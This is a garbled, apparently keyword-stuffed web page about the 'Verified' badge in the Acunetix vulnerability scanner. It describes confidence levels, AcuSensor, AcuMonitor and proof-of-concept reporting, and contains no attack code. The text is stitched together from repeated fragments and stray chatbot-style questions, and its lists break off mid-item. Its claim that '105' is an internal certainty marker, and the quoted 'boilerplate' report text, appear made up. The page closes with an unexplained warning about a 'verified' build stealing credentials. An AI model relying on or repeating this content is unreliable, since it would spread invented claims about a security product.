Acunetix version 10.5 introduced the "Verified" feature, designed to eliminate false positives by automatically confirming vulnerabilities like SQL injection and XSS through AcuSensor (IAST) or AcuMonitor technologies. This capability allows for 100% confidence in security scan results, providing actionable proofs of concept (PoCs) that streamline remediation for development teams. For more details on the verification process, visit Acunetix Support AcuMonitor, AcuSensor, and the Acunetix Verified Badge
The phrase "Acunetix 105 verified" refers to a specific status in the Acunetix Web Vulnerability Scanner
indicating that a high-severity vulnerability has been confirmed by the software without any doubt of a false positive.
Below is the standard descriptive text typically associated with this status in security reports: Acunetix Verification Overview Status: Verified (105)
This indicates that the scanner has successfully performed an automated exploit
or a round-trip proof-of-concept to confirm the existence of the vulnerability.
The "105" designation is an internal confidence level marker used by the Acunetix engine to signify 100% certainty
, meaning manual re-testing is generally not required to prove the flaw exists. Typical Report Text
If you are looking for the boilerplate text used in these findings, it usually follows this structure: Vulnerability Confirmed
"Acunetix has successfully verified this vulnerability. This means that the scanner was able to prove the existence of the vulnerability by performing a safe exploit or by receiving a specific response that is only possible if the vulnerability is present. No false positive is possible for this finding." Key Implications Zero False Positives
: The "Verified" badge is designed to save security researchers time by filtering out "Possible" or "Inferred" risks. Immediate Action acunetix 105 verified
: Because the risk is confirmed, these items should be prioritized for immediate patching or mitigation. Proof of Concept (PoC)
: Acunetix typically includes the specific HTTP request and response in the "Vulnerability Details" section that triggered the 105 verified status. technical remediation steps
for a specific vulnerability type (like SQLi or XSS) found under this status?
Understanding the Acunetix Verified Badge: A Deep Dive The Acunetix Verified badge is a critical mark of confidence within the Acunetix Vulnerability Scanner ecosystem. It signifies that a detected vulnerability has been automatically confirmed by the scanner with 100% confidence, effectively eliminating the need for manual verification by security teams. Core Mechanism of Verification
The "Verified" status is primarily achieved through high-confidence detection methods that prove the exploitability of a vulnerability without causing harm.
100% Confidence Level: When a vulnerability is displayed in the Acunetix interface, it includes a Confidence % column. Items marked with 100% are automatically granted the Acunetix Verified badge.
Proof of Concept (PoC): For many high-risk vulnerabilities, such as Cross-site Scripting (XSS) or SQL Injection, Acunetix generates a safe PoC to demonstrate that the issue is real and exploitable.
Gray-Box Testing: Tools like AcuSensor provide the scanner with interior access to the application’s source code and server-side environment, allowing it to pinpoint the exact line of code responsible for the flaw, which contributes to the 100% verification rate. Benefits for Security Teams
The integration of verified vulnerabilities into a security workflow provides several operational advantages:
Elimination of False Positives: Traditional scanners often flag "potential" issues that turn out to be harmless. Verified results ensure that security professionals do not waste time investigating "ghost" vulnerabilities. Acunetix version 10
Prioritized Remediation: Since these issues are confirmed as 100% real, teams can immediately prioritize them for fixing, often integrating them directly into issue trackers like Jira or GitHub.
Detailed Evidence: When viewing a verified vulnerability, Acunetix provides comprehensive information including attack details, potential impact, and remediation steps. How to Access Verified Results Run a Scan: Initiate a scan on your target URL.
Navigate to Vulnerabilities: Select the Vulnerabilities tab from the left-side menu.
Apply Filters: Use the filter bar to display only results with a Confidence level of 100 percent.
Review the Badge: Double-click a vulnerability to see the Acunetix Verified badge within the detailed view. Advanced Features Supporting Verification
AcuMonitor: Facilitates the detection of vulnerabilities that do not provide an immediate response to the scanner, such as Blind XSS or Out-of-band SQLi.
Reporting: You can generate a Detailed Scan Report that specifically highlights these confirmed vulnerabilities for stakeholders. AcuMonitor, AcuSensor, and the Acunetix Verified Badge
Select Vulnerabilities from the left-side menu. Check the Confidence % column for a value of 100% to identify the vulnerabilities. Detailed Scan Report - Acunetix
vulnerability scanner designed to eliminate manual double-checking for security teams. Core Concept: The "Verified" Badge When Acunetix performs a scan, it assigns a
badge to specific vulnerabilities. This badge serves as a digital "proof of exploit," signaling that the scanner has successfully confirmed the vulnerability exists with 100% confidence No False Positives: For complete security, use Acunetix 105 verified scans
The primary purpose of this feature is to allow developers and security professionals to skip the "triage" phase. If an issue is marked as verified, you can immediately begin remediation without worrying about it being a false alarm. Proof of Concept (PoC):
For many verified vulnerabilities, Acunetix provides a PoC, such as the actual data extracted from a database in a SQL Injection or the specific script executed in Cross-Site Scripting (XSS) How It Works: Technical Implementation
The "Verified" status is often achieved through the synergy of two proprietary technologies: AcuSensor (IAST):
This is an Interactive Application Security Testing (IAST) sensor installed inside the application code. It gives the scanner "eyes" inside the backend, allowing it to see exactly how a malicious payload travels through the code. AcuMonitor:
This component handles "out-of-band" vulnerabilities—issues that don't show an immediate response to the scanner but trigger a call to an external server. AcuMonitor catches these "shout-backs" to confirm the vulnerability. Key Benefits for Teams Faster Remediation:
Security teams can send verified issues directly to developers via integrations like , trusting that the report is accurate. Focus on Logic:
By automating the verification of common flaws (like SQLi or XSS), expert penetration testers can spend more time on complex business logic vulnerabilities that require human intuition. Compliance Ready: Verified vulnerabilities carry more weight in compliance reports
(like PCI DSS or HIPAA), as they provide undeniable evidence of a security gap. for a specific environment like AcuMonitor, AcuSensor, and the Acunetix Verified Badge
No tool or methodology is perfect. A 105 verified status does not guarantee:
For complete security, use Acunetix 105 verified scans in conjunction with:
That “verified” build could quietly scan your local files, browser credentials, and development projects, then send them to a command-and-control server. You might scan a client’s website for vulnerabilities while unknowingly exposing their source code to hackers.